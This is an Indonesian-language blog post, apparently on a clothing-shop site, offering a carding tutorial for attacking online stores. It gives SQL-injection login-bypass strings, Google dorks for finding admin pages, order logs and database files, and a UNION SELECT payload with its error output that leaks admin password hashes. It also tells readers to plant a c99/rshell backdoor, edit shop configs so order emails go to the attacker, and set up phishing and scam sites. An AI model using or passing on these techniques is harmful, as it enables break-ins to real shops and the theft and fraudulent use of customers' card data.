INDONESIA HACKER CYBER TEAM


1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic

# Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:


Ada yang mau lihat lihat koleksi atau membeli KAOS DAKWAH atau KAOS DISTRO bisa di lihat stok nya di GHIRAH


admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–
dsb

Contoh:
Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
Misal target :

http://www.namasitusnya.com/shop/admin/shopadmin.asp

Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil :)

2. Shopping Order Log – Informasi Log Order di Server
# Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.
Contoh:
Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”
atau inurl:order filetype:txt / inurl:order filetype:log dsb.
Misal target:

http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log
http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt

Selamat menemukan :)

3. Database Information – Database Source Location – Database Path
# Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.

Contoh:
Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
Misal target:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/data/vsproducts.mdb

Selamat mencari.. ^^


4. SQL Injection Advanced Shop Vulnreabilty
# Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb. Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.

Contoh:
Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsb
http://www.targetnya.com/shop/product_details.php?item_id=13
Ganti tulisan itu dengan :
products_rss.php?category_id=1' UNION SELECT concat(login,char(58)
,password),0 FROM va_admins — /*
jadi :http://www.targetnya.com/shop/products_rss.php?category_id=1
‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*
dah kalo ada yang errornya kaya gini :

[color="Red"]DB ERROR 1064[/color]

[code]We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.

The details of the error are shown below. Please quote this in any correspondance regarding this problem.

Page URL: [url]http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION[/url]

%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
Referrer URL:

Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1' UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2' at line 1
[/code]

Nah klo udah jangan lupa decrypt passwordnya ya :)

5. Admin Shop Send Mail Order
# Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.

Contoh:

Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.

Misal target:

[url]http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php[/url]
Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:
var $dbtype = ‘mysql’;
var $host = ‘localhost’;
var $user = ’shop24_admin’;
var $db = ’shopsex_site’;
var $mailer = ‘mail’;
var $ordermailsendto = ‘ben@netboost.com.au‘;

Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.
Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..

6. Phising & Scaming
# Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin. Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.
Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.




LINK  WEB
BACA SELENGKAPNYA KAOS
BACA SELENGKAPNYA KAOS COUPLE
BACA SELENGKAPNYA KAOS DAKWAH
BACA SELENGKAPNYA KAOS NASEHAT
BACA SELENGKAPNYA KAOS CYBER
BACA SELENGKAPNYA KAOS MOTIVASI
BACA SELENGKAPNYA KAOS POLOS
BACA SELENGKAPNYA DESAIN KAOS
BACA SELENGKAPNYA MUKENA
BACA SELENGKAPNYA MUKENA BALI
BACA SELENGKAPNYA MUKENA KATUN JEPANG
BACA SELENGKAPNYA  MODEL MUKENA
BACA SELENGKAPNYA  BATIK

BACA SELENGKAPNYA MODEL BAJU BATIK
Axact

KAOS DAKWAH

KAOS DAKWAH adalah blog membahas tentang cara pembuatan Kaos Dakwah sampai bagaimana cara menjual Kaos Dakwah Online maupun offline, Silakan cari artikel di GHIRAH.COM..Terima Kasih telah berkunjung di blog sederhana ini, Jika antum PRODUSEN KAOS DAKWAH ATAU DISTRO MAU KERJASAMA SILAKAN KONTAK NO TLP YANG ADA DI WEB GHIRAH.COM

Post A Comment:

0 comments: